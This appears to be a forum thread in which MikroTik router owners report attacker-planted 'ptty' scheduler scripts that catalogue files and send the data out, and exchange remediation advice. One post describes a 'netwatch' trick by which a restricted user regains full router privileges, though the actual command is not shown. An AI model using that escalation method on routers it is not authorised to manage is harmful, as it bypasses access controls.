I found 2 suspicious scripts on my Mikrotik router after installing 6.39rc41
Scripts were owned by admin (disabled of course)

The first one capture a list of the files

ptty-r The second send the data to a page

ptty Any recommendation? Have you seen this before?
Is there other investigation I can do? To figure out if anything has been changed
Thanks

If your concern is that RouterOS upgrade added those scripts, then no, it is not possible.

Somebody logged in and added those scripts. Disable admin user and change passwords for other users on that router.

Any recommendation? Have you seen this before?
Is there other investigation I can do? To figure out if anything has been changed

I've seen this before on some devices: there was also the user "router" with full privileges (with unknown password), and "admin" with newly created "admin" group with reduced privileges.

Also check firewall, you should have a default deny rule for inbound connections on the WAN. Consider not allowing router admin access from WAN. Don't leave the default admin password as nothing, malware inside the network can log into the router and configure whatever it wants.

If you have the "router" user with full privileges, and have your "admin" set to "admin" group with reduced set of privileges (ssh, telnet, policy are disabled), you may try to log in with admin and add a netwatch up rule for 127.0.0.1 with something like this: So there'll be no need to make a configuration reset.

Thank you Jabberd for your Netwatch line - it allowed me as admin to get my Router to work with New Terminal and SSH login - both of which I was logged out. I only had my router with no password on the WAN for minutes and yet got broken into - amazed how quickly that happened.

HI
But looking on another way
This netwach trick is some kind of exploit
If some tech have limited privileges on group that him belong, he can promote the group tu full access.


Enviado de meu XT1580 usando Tapatalk

Yes, we are already in the process in fixing it. On the other hand, that person still needs an existing user with "write" privileges.

OK, I should've reported this "feature" to the support. I thought that mentioning it here was enough for things to get fixed

Hi! We found exactly the same today in a router with 6.43.2 (but it was with no Firewall rules during an hour )

Do you know if the "netwatch trick" can be still done to recover privileges in the admin account? We can enter with admin but there is a "router" user with full privileges and we do not know the password.

The router is in a remote location so it would be a big inconvenience to go there to fix this.

Thanks!

Old thread, I know, but I think its worth bumping.

I had same thing happen to me. There were 2 ptty scripts in my scheduler. I had my router exposed to WAN with default username only a matter of minutes but didnt notice the script until a few days later. I deleted scripts, the admin user, the new router user they created, and changed my password.

Be careful out there. Thanks for posting.

Old thread, I know, but I think its worth bumping.

I had same thing happen to me. There were 2 ptty scripts in my scheduler. I had my router exposed to WAN with default username only a matter of minutes but didnt notice the script until a few days later. I deleted scripts, the admin user, the new router user they created, and changed my password.

Be careful out there. Thanks for posting.

As it had been discussed in other threads, the safest thing to do when one notices that router has been compromised, is to export configuration (the ASCII part using /export command), review the config for signs of anything weird, then netinstall the router (this is the only method that really removes everything), start from factory defaults (SOHO routers have quite sensible default firewall filter settings) and adjust only what's clearly needed.

Ok thanks for the heads up. I noticed after I posted this a few more scripts and a few other things inside my router that I had to delete. Since, this Mikrotik is being used as a DMZ between the internet and my firewall, I figured I may be ok and wont worry about the reconfiguration. But I think you're right, I should do a thorough wipe regardless. Thanks again